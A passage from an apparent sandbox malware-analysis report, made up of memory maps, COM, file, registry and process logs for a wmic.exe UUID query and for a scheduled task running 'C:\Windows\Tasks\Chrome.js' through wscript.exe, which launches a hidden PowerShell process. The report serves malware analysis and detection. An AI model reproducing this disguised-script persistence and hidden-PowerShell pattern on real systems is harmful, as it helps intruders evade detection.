| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7fefda90000 | 0x7fefdb20fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefee30000 | 0x7fefee7cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7fefee80000 | 0x7feff0d8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7feff6e0000 | 0x7feff857fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7feff870000 | 0x7feff999fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7feffec0000 | 0x7feffec7fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (10)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | F6D90F12-9C73-11D3-B32E-00C04F990BB4 | 2933BF95-7B36-11D2-B20E-00C04F983E60 | cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Create | 8D1C559D-84F0-4BB3-A7D5-56A7435A9BA6 | BFBF883A-CAD7-11D3-A11B-00105A1F515A | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli\ms_409 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\YKYD69Q\ROOT\CIMV2 |
|
1 | |
| Execute | WBEMLocator | IWbemServices | method_name = ExecQuery, query_language = WQL, query = SELECT UUID FROM Win32_ComputerSystemProduct |
|
1 |
File (4)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\wbem\\texttable.xsl | share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 |
Registry (5)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging, data = 48 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory, data = 37 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Log File Max Size, data = 54 |
|
1 |
Module (5)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
1 | |
| Load | ole32.dll | base_address = 0x7feffa40000 |
|
1 | |
| Get Handle | c:\windows\system32\wbem\wmic.exe | base_address = 0xffef0000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x7feffa67490 |
|
1 |
System (10)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = System Time, time = 2019-01-08 12:43:41 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 306807 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-08 12:43:41 (Local Time) |
|
1 | |
| Get Time | type = System Time, time = 2019-01-08 12:43:43 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 308881 |
|
2 | |
| Get Time | type = Ticks, time = 308897 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Process #22: wscript.exe
114
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\system32\wscript.exe |
| Command Line | C:\Windows\System32\WScript.exe "C:\Windows\Tasks\Chrome.js" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:33, Reason: Child Process |
| Unmonitor | End Time: 00:04:35, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x968 |
| Parent PID | 0x850 (c:\windows\system32\taskeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8D4
0x
928
0x
930
0x
938
0x
A40
0x
AA4
0x
F0
0x
600
0x
808
0x
1C4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00250000 | 0x002b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x003e0000 | 0x003e5fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00597fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00720fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x01b2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b30000 | 0x01b30000 | 0x01e72fff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x01e80000 | 0x01efcfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001e80000 | 0x01e80000 | 0x01f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01e80fff | Pagefile Backed Memory | r |
|
|
|
- |
| chrome.js | 0x01e90000 | 0x01e90fff | Memory Mapped File | r |
|
|
|
- |
| rsaenh.dll | 0x01e90000 | 0x01ed4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| chrome.js | 0x01ea0000 | 0x01ea0fff | Memory Mapped File | r |
|
|
|
|
| wshom.ocx | 0x01ea0000 | 0x01eb3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ec0000 | 0x01ec0000 | 0x01ec0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001ed0000 | 0x01ed0000 | 0x01ed1fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x01ee0000 | 0x01ee0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001f70000 | 0x01f70000 | 0x0204efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002050000 | 0x02050000 | 0x02051fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002060000 | 0x02060000 | 0x02061fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x02070000 | 0x02073fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002080000 | 0x02080000 | 0x02080fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x0218ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02190000 | 0x021affff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x021b0000 | 0x021b3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000021c0000 | 0x021c0000 | 0x021c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x022cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x022d0000 | 0x0259efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x0265ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x025a0000 | 0x025cffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x025d0000 | 0x02635fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x0265ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026b0000 | 0x026b0000 | 0x027affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027b0000 | 0x027b0000 | 0x037affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000037b0000 | 0x037b0000 | 0x038affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003910000 | 0x03910000 | 0x03a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a90000 | 0x03a90000 | 0x03b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d30000 | 0x03d30000 | 0x03e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ee0000 | 0x03ee0000 | 0x03fdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003fe0000 | 0x03fe0000 | 0x043d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x046bffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| wscript.exe | 0xffd60000 | 0xffd8bfff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x7fef3ed0000 | 0x7fef3f23fff | Memory Mapped File | rwx |
|
|
|
- |
| ieframe.dll | 0x7fef3f30000 | 0x7fef4ae6fff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x7fef8010000 | 0x7fef8043fff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x7fef8050000 | 0x7fef8077fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fef8080000 | 0x7fef811ffff | Memory Mapped File | rwx |
|
|
|
- |
| jscript.dll | 0x7fef90e0000 | 0x7fef91c2fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x7fef9210000 | 0x7fef924bfff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x7fef92b0000 | 0x7fef92ccfff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x7fef92e0000 | 0x7fef931afff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7fefb570000 | 0x7fefb587fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x7fefbb40000 | 0x7fefbb4afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7fefc080000 | 0x7fefc097fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7fefda90000 | 0x7fefdb20fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7fefdd20000 | 0x7fefdd59fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7fefed90000 | 0x7fefee26fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7fefee80000 | 0x7feff0d8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7feff6e0000 | 0x7feff857fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7feff870000 | 0x7feff999fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffa8000 | 0x7fffffa8000 | 0x7fffffa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (6)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | F414C260-6AC0-11CF-B6D1-00AA00BBBB58 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | 00000323-0000-0000-C000-000000000046 | 00000146-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 275C23E2-3747-11D0-9FEA-00AA003F8646 | DCCFC164-2B38-11D2-B7EC-00C04F8F5D9A | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | WScript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (4)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Tasks\Chrome.js | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\Tasks\Chrome.js | type = size |
|
1 | |
| Get Info | C:\Windows\Tasks\Chrome.js | type = size |
|
1 | |
| Read | C:\Windows\Tasks\Chrome.js | size = 3250, size_out = 3250 |
|
1 |
Registry (30)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\.js | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\JSFile\ScriptEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 16, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 16, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 16, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 16, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\.js | data = JSFile, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\JSFile\ScriptEngine | data = JScript, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 | value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powershell | show_window = SW_HIDE |
|
1 |
Module (30)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x77b20000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x7feffa40000 |
|
1 | |
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x7fefdfd0000 |
|
1 | |
| Get Handle | c:\windows\system32\wscript.exe | base_address = 0xffd60000 |
|
3 | |
| Get Handle | c:\windows\system32\ole32.dll | base_address = 0x7feffa40000 |
|
2 | |
| Get Filename | c:\windows\system32\wscript.exe | process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x77b3c4a0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegisterTraceGuidsA, address_out = 0x77c5f570 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExA, address_out = 0x7feff0fb5f0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExA, address_out = 0x7feff0fc480 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7feff100710 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetObjectContext, address_out = 0x7feffa5c920 |
|
1 | |
